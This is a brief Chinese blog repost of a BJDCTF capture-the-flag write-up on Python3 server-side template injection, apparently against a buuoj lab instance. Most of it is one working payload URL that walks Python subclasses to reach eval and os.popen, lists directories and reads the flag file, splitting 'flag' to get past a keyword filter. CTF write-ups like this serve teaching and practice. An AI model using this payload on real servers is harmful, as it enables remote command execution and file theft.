首页 > 其他 > 详细

BJDCTF

时间:2020-03-21 20:07:17      阅读:58      评论:0      收藏:0      [点我收藏+]

python3的模板注入
技术分享图片

非常简单。。。就是直接执行命令就行。。虽然过滤了flag,但是拼接下就好了。。。。

技术分享图片

payload:
http://fd5883ee-b8e2-4bf1-88af-33936a182228.node3.buuoj.cn/qaq?name={%%20for%20c%20in%20[].__class__.__base__.__subclasses__()%20%}{%%20if%20c.__name__==%27catch_warnings%27%20%}{{%20c.__init__.__globals__[%27__builtins__%27].eval(%22__import__(%27os%27).popen(%27ls%20./;ls%20./../../../;cat%20../fl%22+%22ag%27).read()%22)%20}}{%%20endif%20%}{%%20endfor%20%}

BJDCTF

原文:https://www.cnblogs.com/hebtu-Enoki-qu/p/12541610.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!